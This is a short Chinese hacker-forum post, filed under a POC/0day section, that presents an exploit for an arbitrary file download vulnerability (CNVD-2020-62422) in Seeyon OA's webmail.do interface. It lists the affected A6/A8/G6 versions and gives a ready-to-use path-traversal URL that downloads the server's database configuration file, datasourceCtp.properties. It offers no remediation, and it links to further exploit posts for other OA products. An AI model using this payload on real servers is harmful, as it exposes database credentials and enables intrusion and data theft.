致远OA 任意文件下载（CNVD-2020-62422）

主题发起人 Shacker
开始时间 09 10, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 10, 2024

## 漏洞概述致远OA的webmail.do接口存在任意文件下载漏洞，攻击者可利用该漏洞下载任意文件，获取敏感信息‘；

PHP:

## 影响范围

```http
A6-V5
A8-V5
G6-V5
影响范围极广泛
```

##  POC&EXP

验证POC-下载数据库配置文件

```http
http://xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=data.txt&filePath=../conf/datasourceCtp.properties
```

批量POC

```http
大宝剑（已同步）
```

致远OA Session-任意文件上传包含EXP

通达OA (蚁剑)通达OA v11.8 后台命令执行漏洞

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC 禅道OA[CNVD-C-2020-121325]-文件上传 Shacker 09 10, 2024 POC/?Day
	POC 禅道 OA[CNVD-C-2020-121325] Shacker 09 10, 2024 POC/?Day
	?day Bsh远程代码执行（CNVD-2019-32204）未授权访问漏洞 Shacker 09 10, 2024 POC/?Day
	致远OA ajax.do任意文件上传（ CNVD-2021-01627） Shacker 09 10, 2024 POC/?Day
	兰陵OA EKP 后台SQL注入漏洞 CNVD-2021-01363 Shacker 09 10, 2024 POC/?Day

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部